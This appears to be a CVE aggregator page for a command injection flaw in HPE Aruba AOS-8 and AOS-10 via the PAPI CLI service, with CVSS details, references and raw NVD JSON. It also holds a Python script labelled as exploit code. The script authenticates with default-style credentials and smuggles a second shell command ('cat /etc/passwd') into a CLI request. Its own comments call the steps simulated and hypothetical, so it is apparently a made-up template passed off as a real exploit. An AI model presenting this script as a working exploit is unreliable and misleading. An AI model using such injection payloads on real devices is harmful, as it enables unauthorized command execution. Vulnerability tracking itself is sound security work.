CVE-2026-44870

Description

Command injection vulnerabilities exist in the command line interface (CLI) service accessed by the PAPI protocol of AOS-8 and AOS-10 Operating Systems. Successful exploitation of these vulnerabilities could allow an authenticated remote attacker to execute arbitrary commands on the underlying operating system.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

HPE Aruba AOS-8 (特定版本)

HPE Aruba AOS-10 (特定版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket

# Proof of Concept for CVE-2026-44870
# Target: HPE Aruba AOS-8 / AOS-10 via PAPI
# Note: Requires valid high-privileged credentials

def exploit(target_ip, target_port, credentials, injected_cmd):
    # Simulate PAPI connection
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_ip, target_port))
        
        # Hypothetical Authentication Step
        auth_packet = f"AUTH {credentials}\n"
        s.send(auth_packet.encode())
        
        # Construct malicious CLI command
        # Appending injection string to execute OS command
        payload = f"show system status; {injected_cmd}; #"
        exploit_packet = f"CLI_CMD {payload}\n"
        
        s.send(exploit_packet.encode())
        response = s.recv(4096)
        print("[+] Command output:")
        print(response.decode())
        
        s.close()
    except Exception as e:
        print(f"[-] Exploit failed: {e}")

if __name__ == "__main__":
    # Example usage
    target = "192.168.1.100"
    port = 8211 # Common PAPI port
    creds = "admin:password"
    cmd = "cat /etc/passwd"
    exploit(target, port, creds, cmd)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44870
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44870
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44870/
[4] VulDB https://vuldb.com/cve/CVE-2026-44870
[5] https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44870", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:45.690", "lastModified": "2026-05-12T20:16:45.690", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Command injection vulnerabilities exist in the command line interface (CLI) service accessed by the PAPI protocol of AOS-8 and AOS-10 Operating Systems. Successful exploitation of these vulnerabilities could allow an authenticated remote attacker to execute arbitrary commands on the underlying operating system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US", "source": "[email protected]"}]}}